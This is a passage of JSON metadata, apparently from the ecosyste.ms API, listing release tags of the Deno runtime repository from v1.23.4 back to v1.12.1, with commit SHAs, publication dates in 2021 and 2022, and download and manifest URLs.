1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v